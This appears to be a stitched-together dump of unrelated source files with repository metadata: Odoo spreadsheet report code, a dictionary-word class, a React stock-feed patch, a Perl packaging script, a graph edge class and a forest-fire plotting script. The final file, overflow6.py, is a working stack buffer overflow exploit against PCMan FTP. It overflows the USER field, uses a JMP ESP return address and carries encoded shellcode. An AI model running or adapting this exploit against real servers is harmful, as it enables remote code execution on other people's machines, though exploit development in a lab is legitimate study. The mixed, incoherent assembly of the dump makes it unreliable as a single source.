                'header': [1, 22, 'text', _render("_('PPh')")],
                'lines': [1, 0, 'number', _render("p['pph']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['pph']"), None, self.rt_cell_style_decimal]},
            'piutang': {
                'header': [1, 22, 'text', _render("_('Piutang')")],
                'lines': [1, 0, 'number', _render("p['piutang']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['piutang']"), None, self.rt_cell_style_decimal]},
            'residual': {
                'header': [1, 22, 'text', _render("_('Residual')")],
                'lines': [1, 0, 'number', _render("p['residual']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['residual']"), None, self.rt_cell_style_decimal]},
        }
        # XLS Template
        # Details template left empty; details rendering is not implemented.
        self.col_specs_template_details = {
        }
    def generate_xls_report(self, _p, _xs, data, objects, wb):
        """Write the report into workbook `wb`, one sheet per entry of
        `_p.reports`: title rows, column headers, data rows, totals, footer.

        NOTE(review): this method relies on Python 2 semantics where map()
        returns a list (c_specs_o is iterated more than once); confirm the
        target runtime before porting.
        """
        wanted_list_overview = _p.wanted_list_overview
        wanted_list_details = _p.wanted_list_details
        self.col_specs_template_overview.update(_p.template_update_overview)
        self.col_specs_template_details.update(_p.template_update_details)
        _ = _p._
        for r in _p.reports:
            # Sheet names must not contain '/'.
            title_short = r['title_short'].replace('/', '-')
            ws_o = wb.add_sheet(title_short)
            for ws in [ws_o]:
                ws.panes_frozen = True
                ws.remove_splits = True
                ws.portrait = 0 # Landscape
                ws.fit_width_to_pages = 1
            row_pos_o = 0
            row_pos_d = 0
            # set print header/footer
            for ws in [ws_o]:
                ws.header_str = self.xls_headers['standard']
                ws.footer_str = self.xls_footers['standard']
            # Title
            ## Company ##
            cell_style = xlwt.easyxf(_xs['left'])
            report_name = ' '.join(
                [_p.company.name, r['title'],
                 _p.report_info])
            c_specs_o = [
                ('report_name', 1, 0, 'text', report_name),
            ]
            row_data = self.xls_row_template(c_specs_o, ['report_name'])
            row_pos_o = self.xls_write_row(
                ws_o, row_pos_o, row_data, row_style=cell_style)
            ## Text + Tgl ##
            cell_style = xlwt.easyxf(_xs['xls_title'])
            report_name = ' '.join(
                [_('LAPORAN Other Receivable Per Tanggal'), _(str(datetime.today().date())),
                 _p.report_info])
            c_specs_o = [
                ('report_name', 1, 0, 'text', report_name),
            ]
            row_data = self.xls_row_template(c_specs_o, ['report_name'])
            row_pos_o = self.xls_write_row(
                ws_o, row_pos_o, row_data, row_style=cell_style)
            ## Tanggal Jtp Start Date & End Date ##
            # Due-date filter range, '-' when a bound was not supplied.
            cell_style = xlwt.easyxf(_xs['left'])
            report_name = ' '.join(
                [_('Tanggal Jatuh Tempo'), _('-' if data['start_date'] == False else str(data['start_date'])), _('s/d'), _('-' if data['end_date'] == False else str(data['end_date'])),
                 _p.report_info])
            c_specs_o = [
                ('report_name', 1, 0, 'text', report_name),
            ]
            row_data = self.xls_row_template(c_specs_o, ['report_name'])
            row_pos_o = self.xls_write_row(
                ws_o, row_pos_o, row_data, row_style=cell_style)
            ## Tanggal Trx Start Date & End Date ##
            # Transaction-date filter range, same '-' convention as above.
            cell_style = xlwt.easyxf(_xs['left'])
            report_name = ' '.join(
                [_('Tanggal Transaksi'), _('-' if data['trx_start_date'] == False else str(data['trx_start_date'])), _('s/d'), _('-' if data['trx_end_date'] == False else str(data['trx_end_date'])),
                 _p.report_info])
            c_specs_o = [
                ('report_name', 1, 0, 'text', report_name),
            ]
            row_data = self.xls_row_template(c_specs_o, ['report_name'])
            row_pos_o = self.xls_write_row(
                ws_o, row_pos_o, row_data, row_style=cell_style)
            row_pos_o += 1
            # Report Column Headers
            c_specs_o = map(
                lambda x: self.render(
                    x, self.col_specs_template_overview, 'header',
                    render_space={'_': _p._}),
                wanted_list_overview)
            row_data = self.xls_row_template(
                c_specs_o, [x[0] for x in c_specs_o])
            row_pos_o = self.xls_write_row(
                ws_o, row_pos_o, row_data, row_style=self.rh_cell_style,
                set_column_size=True)
            ws_o.set_horz_split_pos(row_pos_o)
            row_data_begin = row_pos_o
            # Columns and Rows
            no = 0
            for p in r['id_ai']:
                c_specs_o = map(
                    lambda x: self.render(
                        x, self.col_specs_template_overview, 'lines'),
                    wanted_list_overview)
                # Patch the running row number into the rendered 'no' column.
                for x in c_specs_o :
                    if x[0] == 'no' :
                        no += 1
                        x[4] = no
                row_data = self.xls_row_template(
                    c_specs_o, [x[0] for x in c_specs_o])
                row_pos_o = self.xls_write_row(
                    ws_o, row_pos_o, row_data, row_style=self.pd_cell_style)
            row_data_end = row_pos_o
            # Totals
            # NOTE(review): the SUM formulas are hard-coded to spreadsheet
            # columns K..O (indices 10-14); they assume the default
            # wanted_list_overview ordering — confirm if the list changes.
            ws_o.write(row_pos_o, 0, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 1, 'Totals', self.ph_cell_style)
            ws_o.write(row_pos_o, 2, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 3, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 4, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 5, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 6, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 7, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 8, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 9, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 10, xlwt.Formula("SUM(K"+str(row_data_begin)+":K"+str(row_data_end)+")"), self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 11, xlwt.Formula("SUM(L"+str(row_data_begin)+":L"+str(row_data_end)+")"), self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 12, xlwt.Formula("SUM(M"+str(row_data_begin)+":M"+str(row_data_end)+")"), self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 13, xlwt.Formula("SUM(N"+str(row_data_begin)+":N"+str(row_data_end)+")"), self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 14, xlwt.Formula("SUM(O"+str(row_data_begin)+":O"+str(row_data_end)+")"), self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 15, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 16, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 17, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 18, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 19, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 20, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 21, None, self.rt_cell_style_decimal)
            ws_o.write(row_pos_o, 22, None, self.rt_cell_style_decimal)
            # Footer
            # Report date plus the printing user's display name.
            ws_o.write(row_pos_o + 1, 0, None)
            ws_o.write(row_pos_o + 2, 0, _p.report_date + ' ' + str(self.pool.get('res.users').browse(self.cr, self.uid, self.uid).name))
# Register the renderer: binds the report service name
# 'report.Laporan Other Receivable' to the account.voucher model,
# parsed by the class defined above.
report_other_receivable_xls('report.Laporan Other Receivable', 'account.voucher', parser = dym_report_other_receivable_print_xls)
| [
"[email protected]"
] | |
ba9793454b72cf6087c048cea652467469da0dc2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_vagrant.py | 25425a414477258cae648761022543eca0a49624 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py |
#calss header
class _VAGRANT():
def __init__(self,):
self.name = "VAGRANT"
self.definitions = [u'a person who is poor and does not have a home or job: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
0784645eb77e3222d6cf458d98c1cc8a5e195fda | db51fc5047cc498f48e2e5782df8092e19de9ddf | /FS2 - stock price data feed.py | 2fdd4f82232c5d96f700e61a63e8bde4d1053091 | [
"MIT"
] | permissive | arishma108/JPMorgan-Chase-Co | e88724ac4d55b9fd98e92dc62bdbb9e809bef6b3 | fffabf67aa1c4dd8e82200c31d47862bc0a4aca6 | refs/heads/master | 2021-03-20T05:55:11.369708 | 2020-12-10T20:29:32 | 2020-12-10T20:29:32 | 247,182,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,639 | py | From 359ec3f820b526c980de52d0396cd7093d5380cf Mon Sep 17 00:00:00 2001
From: Arishma Persadh <[email protected]>
Date: Tue, 4 July 2020 11:33:07 +0530
Subject: [PATCH] Make model solution
---
src/App.tsx | 24 ++++++++++++++++++------
src/Graph.tsx | 14 ++++++++++----
2 files changed, 28 insertions(+), 10 deletions(-)
diff --git a/src/App.tsx b/src/App.tsx
index 0728518..b83f979 100755
--- a/src/App.tsx
+++ b/src/App.tsx
@@ -8,6 +8,7 @@ import './App.css';
*/
interface IState {
data: ServerRespond[],
+ showGraph: boolean,
}
/**
@@ -22,6 +23,7 @@ class App extends Component<{}, IState> {
// data saves the server responds.
// We use this state to parse data down to the child element (Graph) as element property
data: [],
+ showGraph: false,
};
}
@@ -29,18 +31,28 @@ class App extends Component<{}, IState> {
* Render Graph react component with state.data parse as property data
*/
renderGraph() {
- return (<Graph data={this.state.data}/>)
+ if (this.state.showGraph) {
+ return (<Graph data={this.state.data}/>)
+ }
}
/**
* Get new data from server and update the state with the new data
*/
getDataFromServer() {
- DataStreamer.getData((serverResponds: ServerRespond[]) => {
- // Update the state by creating a new array of data that consists of
- // Previous data in the state and the new data from server
- this.setState({ data: [...this.state.data, ...serverResponds] });
- });
+ let x = 0;
+ const interval = setInterval(() => {
+ DataStreamer.getData((serverResponds: ServerRespond[]) => {
+ this.setState({
+ data: serverResponds,
+ showGraph: true,
+ });
+ });
+ x++;
+ if (x > 1000) {
+ clearInterval(interval);
+ }
+ }, 100);
}
/**
diff --git a/src/Graph.tsx b/src/Graph.tsx
index ec1430e..ddd4d55 100644
--- a/src/Graph.tsx
+++ b/src/Graph.tsx
@@ -14,7 +14,7 @@ interface IProps {
* Perspective library adds load to HTMLElement prototype.
* This interface acts as a wrapper for Typescript compiler.
*/
-interface PerspectiveViewerElement {
+interface PerspectiveViewerElement extends HTMLElement {
load: (table: Table) => void,
}
@@ -31,8 +31,9 @@ class Graph extends Component<IProps, {}> {
}
componentDidMount() {
+ console.log('rendering');
// Get element to attach the table from the DOM.
- const elem: PerspectiveViewerElement = document.getElementsByTagName('perspective-viewer')[0] as unknown as PerspectiveViewerElement;
+ const elem = document.getElementsByTagName('perspective-viewer')[0] as unknown as PerspectiveViewerElement;
const schema = {
stock: 'string',
@@ -40,15 +41,20 @@ class Graph extends Component<IProps, {}> {
top_bid_price: 'float',
timestamp: 'date',
};
-
- if (window.perspective && window.perspective.worker()) {
+ if (window.perspective) {
this.table = window.perspective.worker().table(schema);
}
if (this.table) {
+ console.log('change table');
// Load the `table` in the `<perspective-viewer>` DOM reference.
// Add more Perspective configurations here.
elem.load(this.table);
+ elem.setAttribute('view', 'y_line');
+ elem.setAttribute('column-pivots', '["stock"]');
+ elem.setAttribute('row-pivots', '["timestamp"]');
+ elem.setAttribute('columns', '["top_ask_price"]');
+ elem.setAttribute('aggregates', '{"stock":"distinct count","top_ask_price":"avg","top_bid_price":"avg","timestamp":"distinct count"}');
}
}
--
2.17.1
| [
"[email protected]"
] | |
c1fe45b3e7445a6563381aa858ccbee35fc7fb33 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007/programming/languages/perl/XML-SAX/actions.py | 5573fe066768c8ff99b6aad789159fe54b90d0fb | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import pisitools
from pisi.actionsapi import perlmodules
def setup():
    """Configure the Perl module build (runs `perl Makefile.PL`)."""
    perlmodules.configure()
def build():
    """Compile the Perl module (runs `make`)."""
    perlmodules.make()
def install():
    """Install the built Perl module into the package image."""
    perlmodules.install()
| [
"[email protected]"
] | |
5506ea8b1391d5f1fe1433f57984e88db7e43cfe | fb617db1881e6ece6f606a3598124966a9b0b070 | /Edge.py | 92c895fc165e0ee8b6a5bac43923ab1ab8b5dd13 | [] | no_license | sitdsa/dsa | 21bf8a4322f205a5440e06325d12dece10f42bbe | 6178be6260dfe4f8444442eee7e7e3d6f0936c25 | refs/heads/master | 2020-12-23T14:59:00.491782 | 2020-03-09T02:46:58 | 2020-03-09T02:46:58 | 237,184,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | __author__ = 'A88253'
class Edge:
v = None # vertex 1
w = None # vertex 2
weight = None # weight
def __init__(self, v, w, wt):
self.v = v
self.w = w
self.weight = wt
# return either endpoint
def either(self):
return self.v
# return the other endpoint
def other(self, v):
if v==self.v:
return self.w
else:
return self.v
def __lt__(self, other):
return self.weight < other.weight
def __gt__(self, other):
return self.weight > other.weight
def __ge__(self, other):
return self.weight >= other.weight
def __le__(self, other):
return self.weight <= other.weight
def __eq__(self, other):
return self.weight == other.weight
def toString(self):
return str(self.v) + "-" + \
str(self.w) + " " + \
str(self.weight)
| [
"[email protected]"
] | |
e857df597344383399adbd6dd4701f5cb1a0d7af | 0e31e5f780915fc505d09655fcd4a2915e587402 | /DC visualization(2d to 4d).py | 2f9ba911dc683f9aae65f72df5247349eb7cee66 | [] | no_license | MohibAyub/Forest-Fire-Analysis-and-Prediction | f764f9f83021bff7055551934e1e0ea9516924d7 | 7cfab9470d16b4b97506e790a8b6472db6e36880 | refs/heads/master | 2021-10-20T04:25:05.372918 | 2019-02-25T22:04:04 | 2019-02-25T22:04:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,726 | py | '''
@author: Kunmao Li
1. new varaible generated:
1). ln(area+1): float64
Based on the characteristics of variable 'area' from the plots, remodel 'area' with logarithm transform
2). FIRE: str
Fire indicator: fire/no fire ,indicating whether there's fire
2. 1D Visualization
Figure 1-13: 13 varaibles inside the dataset
Figure 14: 1 new varible ln(area+1) generated
For every figure, 3 plots generated:
Univariate Histogram: x-axis: the variable itself ; y-axis: the freqeuncy/times of the data
Kernel Density Estimation: x-axis: the variable itself; y-axis:the probability density of the variable estimated
Single Parameter Distribution: the combination of above two plots for better observation with classification and comparison
3. 2D Visualization(DMC & temp/RH/rain)
Figure 15: pairplots(diagonal:the kernel density estimation; non-diagonal: scatter plots with linear regression line given)
also, the data has been classified according to variable 'FIRE' and displayed green when no fire and red when on fire
Figure 16: pairplots(diagonal: single variable distribution; non-diagonal: kernel density plots of two variables)
Figure 17-20: more complicated, detailed and advanced plots given:
kde plots: demonstrate the density distribution between two variables with color change according to the color palatte set
scatter plots: spot the data easily
axis: also display the distribution line of each variable with different color
color bar: relate the color shade/range with data values for identifying the level of density
4. 3D Visualization(DMC & any two from temp,RH,rain)
Figure 21-23:histograms: x,y-axis: any two from temp,RH,rain; z-axis: DMC
classify the histograms by variable 'FIRE': (red histograms:fire; green histograms:no fire)
5. 4D Visualization
Figrue 24Realize the 4-th dimension by marking the histograms with different colors based on the interval values of DMC
x,y,z-axis: temp,RH,rain
'''
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import numpy as np
import scipy.io as sio
from mpl_toolkits.mplot3d import Axes3D
fire = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/forest-fires/forestfires.csv')
fire.month=fire.month.map({'jan':1,'feb':2,'mar':3,'apr':4,'may':5,'jun':6,'jul':7,'aug':8,'sep':9,'oct':10,'nov':11,'dec':12})
fire.day=fire.day.map({'mon':1,'tue':2,'wed':3,'thu':4,'fri':5,'sat':6,'sun':7})
data=pd.DataFrame(fire,columns=['X','Y','month','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain','area'])
'''
1D: Univariate Histograms,Kernel Density Estimation and Single Parameter Distribution
'''
n=1
for i in ['X','Y','month','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain','area']:
plt.figure(n)
plt.subplot(131)# Univariate Histograms
plt.title('Univariate Histogram', fontsize=14, position=(0.5,1.05))
plt.ylabel('Frequency')
sns.distplot(fire[i],kde=False,color='r',rug=True)
plt.subplot(132) # Kernel Density Estimation
plt.title('Kernel Density Estimation', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
sns.distplot(fire[i],hist=False,color='g',kde_kws={'shade':True})
plt.subplot(133) # Single Parameter Distribution
plt.title('Single Parameter Distribution', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
sns.distplot(fire[i],color='m')
n += 1
'''
According to the above three plots of 'area' in figure 13, the parameter is pretty distorted towards 0.0
Thus using logrithm transform ln(area+1) to remodel 'area' and generate the new varibale 'ln(area+1)'
'''
fire['ln(area+1)']=np.log(fire['area']+1)
plt.figure(14)
plt.subplot(131)# Univariate Histograms
plt.title('Univariate Histogram', fontsize=14, position=(0.5,1.05))
plt.xlabel('ln(area+1)')
plt.ylabel('Frequency')
sns.distplot(fire['ln(area+1)'],kde=False,color='r',rug=True)
plt.subplot(132) #Kernel Density Estimation
plt.title('Kernel Density Estimation', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
plt.xlabel('ln(area+1)')
sns.distplot(fire['ln(area+1)'],hist=False,color='g',kde_kws={'shade':True})
plt.subplot(133) # Single Parameter Distribution
plt.title('Single Parameter Distribution', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
plt.xlabel('ln(area+1)')
sns.distplot(fire['ln(area+1)'],color='m')
'''
Based on the forest Fire Weather Index system, DMC is influenced by temperature(temp), reletive humidity(RH) and rain
To clarify the correlation between DMC and the rest variables initially, create the pairplots.
figure 15: 16 pairplots totally
:4 Diagonal plots: kde plots indicating the probability density of the variable
:14 Non-Diagonal plots: scatter diagrams with linear regression line generated
p.s.: for better visualization, adding variable'FIRE',which indicates 'fire' or 'no fire'
and mark the data values with two colors(red for fire;green for no fire)
figrue 16: 16 pairplots totally
:4 Diagonal plots: single paramter distribution
:14 Non-Diagonal plots: kdeplots of two variables(the core indicates the highest density)
'''
plt.figure(15)
df1=pd.DataFrame(fire,columns=['DMC','temp','RH','rain','ln(area+1)'])
# set [ln(area+1)>0]=1 ; [ln(area+1)=0]=0
df1['FIRE'] = np.where(df1['ln(area+1)']>0, 'fire', 'no fire')
sns.pairplot(df1,vars=['DMC','temp','RH','rain'],kind='reg',hue='FIRE',palette='hls',markers=["o", "x"])
plt.show()
plt.figure(16)
g = sns.PairGrid(df1)
g.map_diag(sns.kdeplot)
g.map_offdiag(sns.kdeplot,cmap="Blues_d",n_levels=20)
plt.show()
'''
2D:
figure 17: DMC-temp & DMC-RH & DMC-rain
figure 18-20: DMC-temp / RH / rain
p.s.: for the plots related to rain, for better observation, adjustment is needed since scatters were initially distributed around 0.00
'''
plt.figure(17)
sub=131
for i in ['temp','RH','rain']:
plt.subplot(sub)
plt.title('DMC-'+i, fontsize=14, position=(0.5,1.05))
sns.kdeplot(df1[i],df1['DMC'], # demonstrate the probability distribution of two variables
cbar = True, # display color bar
shade = True, # display shades
cmap = 'Reds', # set the color palatte
shade_lowest=False, # not display periphery color/shade
n_levels = 40 # number of curves, the higher, the smoother
)# the color change indicates the change of density
plt.grid(linestyle = '--')
plt.scatter(df1[i], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1[i], color='g', axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color='r', axis='y',alpha = 0.5)
sub += 1
plt.show()
plt.figure(18) # DMC-temp
plt.title('DMC-temp', fontsize=14, position=(0.5,1.05))
pal=sns.cubehelix_palette(8, gamma=2,as_cmap=True)
sns.kdeplot(df1['temp'],df1['DMC'],cbar = True,shade = True,cmap = pal,shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['temp'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['temp'], color="orange", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="purple", axis='y',alpha = 0.5)
plt.show()
plt.figure(19) # DMC-RH
plt.title('DMC-RH', fontsize=14, position=(0.5,1.05))
pal=sns.cubehelix_palette(8, start=.5, rot=-.75,as_cmap=True)
sns.kdeplot(df1['RH'],df1['DMC'],cbar = True,shade = True,cmap = pal,shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['RH'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['RH'], color="blue", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="green", axis='y',alpha = 0.5)
plt.figure(20) # DMC-rain
plt.title('DMC-rain', fontsize=14, position=(0.5,1.05))
sns.kdeplot(df1['rain'],df1['DMC'],cbar = True,shade = True,cmap = 'Purples',shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['rain'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['rain'], color="orange", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="purple", axis='y',alpha = 0.5)
plt.show()
fig1=plt.figure(21)
ax = fig1.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['rain']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
'''
mark the bars with two colors for better observation
red: fire
green: no fire
'''
q=df1['FIRE']
C = []
for a in q:
if a == 'fire':
C.append('red')
else:
C.append('green')
dx = 0.6 * np.ones_like(x) # set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('temp-rain-DMC')
ax.set_xlabel('temp')
ax.set_ylabel('rain')
ax.set_zlabel('RH')
plt.axis([0,35,-6,6])#set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
fig2=plt.figure(22)
ax = fig2.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['RH']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
dx = 0.6 * np.ones_like(x)# set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('temp-RH-DMC')
ax.set_xlabel('temp')
ax.set_ylabel('RH')
ax.set_zlabel('DMC')
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
fig3=plt.figure(23)
ax = fig3.add_subplot(111, projection='3d')
x,y,z = np.array(fire['rain']),np.array(fire['RH']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
dx = 0.1 * np.ones_like(x)# set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('rain-RH-DMC')
ax.set_xlabel('rain')
ax.set_ylabel('RH')
ax.set_zlabel('DMC')
plt.axis([-6,6,20,100]) #set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
plt.show()
'''
4D:
axies:x: temp y:rain z:RH
4th demension: DMC
displaying DMC by mark the bars with different colors based on the value intervals of DMC
'''
fig = plt.figure(24)
ax = fig.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['rain']),np.array(fire['RH'])
x = x.flatten('F')
y = y.flatten('F')
# Based on the interval values of DMC, mark the histograms with different colors
q=fire['DMC']
C = [] # the list serving as the color palatte
for a in q:
if a < 50:
C.append('orange') # for data from DMC <50, mark it with orange
elif a < 100:
C.append('blue') # for data from DMC belonging to [50,100), mark it with blue
elif a < 150:
C.append('purple') # for data from DMC belonging to [100,150), mark it with purple
elif a < 200:
C.append('red') # for data from DMC belonging to [150,200), mark it with red
elif a > 200:
C.append('green') # for data from DMC >200, mark it with greem
#dx,dy,dz:length width altitude
dx = 0.6 * np.ones_like(x)# set the width of the bars, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('DMC-temp-rain-RH')
ax.set_xlabel('temp')
ax.set_ylabel('rain')
ax.set_zlabel('RH')
plt.axis([0,35,-6,6])#set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
plt.show()
| [
"[email protected]"
] | |
a8cff99d9cc16ff3c36e4d240156337d618ee0da | 15b45026f39eeb213c9b33b59e79791381b1f24e | /1. ChatBot.py | 0856ca8e380b04f65517dd4fff650453b80058fe | [] | no_license | Afatirk/Robokalaam-Assignment | 51bacea5d8ed5c25998daf323500cb13e284a275 | 1d7cedbae3c257316ba64e52c46781d2827c0852 | refs/heads/main | 2023-01-15T13:44:57.056496 | 2020-11-23T08:17:29 | 2020-11-23T08:17:29 | 315,239,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | from nltk.chat.util import Chat, reflections
pairs=[['My name is (.*)',['Hi %1']],
['(.*) is your name?',['My name is JARVIS The Robot!']],
['(Hi|Hello|Heyy|hey)',['Hey there','Hi','Hellooo','Hello, nice to meet you']],
['(.*) created you?',['Abdul Fatir Sir did']],
['How is the weather in (.*)',['The weather is Good in %1']],
['(.*) help (.*)',['I can help you']]]
chat=Chat(pairs, reflections)
chat.converse()
| [
"[email protected]"
] | |
40d746d219cf27e2d4c05238491115c46a3beb00 | 092788f4b12d733abff65eb587d9d7369765c6e5 | /buffer_overflow/pcman_ftp/overflow6.py | 303ce83da42395345f64626fc0050d4789c2af68 | [] | no_license | shajd/PTP | 679a5921fe81dac0bb574cd0983045a7c827fbb3 | 52011adb7c507e376d98c4eab1f4ecaf0037ff6a | refs/heads/master | 2022-11-06T14:41:41.288177 | 2020-06-18T04:41:14 | 2020-06-18T04:41:14 | 269,221,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,022 | py | #!/usr/bin/env python2
import socket
import struct
# set up the IP and port we're connecting to
RHOST = "10.0.2.8"
RPORT = 21
buf_totlen = 2500
offset_srp = 2007
ptr_jmp_esp = 0x7c9d30d7
sub_esp_10 = "\x83\xec\x10"
shellcode_calc = ""
shellcode_calc += "\xb8\xa2\xf0\x26\x08\xd9\xcd\xd9\x74\x24"
shellcode_calc += "\xf4\x5a\x31\xc9\xb1\x31\x31\x42\x13\x83"
shellcode_calc += "\xc2\x04\x03\x42\xad\x12\xd3\xf4\x59\x50"
shellcode_calc += "\x1c\x05\x99\x35\x94\xe0\xa8\x75\xc2\x61"
shellcode_calc += "\x9a\x45\x80\x24\x16\x2d\xc4\xdc\xad\x43"
shellcode_calc += "\xc1\xd3\x06\xe9\x37\xdd\x97\x42\x0b\x7c"
shellcode_calc += "\x1b\x99\x58\x5e\x22\x52\xad\x9f\x63\x8f"
shellcode_calc += "\x5c\xcd\x3c\xdb\xf3\xe2\x49\x91\xcf\x89"
shellcode_calc += "\x01\x37\x48\x6d\xd1\x36\x79\x20\x6a\x61"
shellcode_calc += "\x59\xc2\xbf\x19\xd0\xdc\xdc\x24\xaa\x57"
shellcode_calc += "\x16\xd2\x2d\xbe\x67\x1b\x81\xff\x48\xee"
shellcode_calc += "\xdb\x38\x6e\x11\xae\x30\x8d\xac\xa9\x86"
shellcode_calc += "\xec\x6a\x3f\x1d\x56\xf8\xe7\xf9\x67\x2d"
shellcode_calc += "\x71\x89\x6b\x9a\xf5\xd5\x6f\x1d\xd9\x6d"
shellcode_calc += "\x8b\x96\xdc\xa1\x1a\xec\xfa\x65\x47\xb6"
shellcode_calc += "\x63\x3f\x2d\x19\x9b\x5f\x8e\xc6\x39\x2b"
shellcode_calc += "\x22\x12\x30\x76\x28\xe5\xc6\x0c\x1e\xe5"
shellcode_calc += "\xd8\x0e\x0e\x8e\xe9\x85\xc1\xc9\xf5\x4f"
shellcode_calc += "\xa6\x36\x14\x5a\xd2\xde\x81\x0f\x5f\x83"
shellcode_calc += "\x31\xfa\xa3\xba\xb1\x0f\x5b\x39\xa9\x65"
shellcode_calc += "\x5e\x05\x6d\x95\x12\x16\x18\x99\x81\x17"
shellcode_calc += "\x09\xfa\x44\x84\xd1\xd3\xe3\x2c\x73\x2c"
# build a message followed by a newline
buf = ""
buf += "A"*(offset_srp - len(buf))
buf += struct.pack("<I", ptr_jmp_esp)
buf += "BBBB"
buf += sub_esp_10
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
# send the message
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((RHOST, RPORT))
s.recv(1024)
s.send('USER ' + buf + '\r\n')
s.recv(1024)
s.send('PASS ' + buf + '\r\n')
s.send('QUIT\r\n')
s.close()
| [
"[email protected]"
] | |
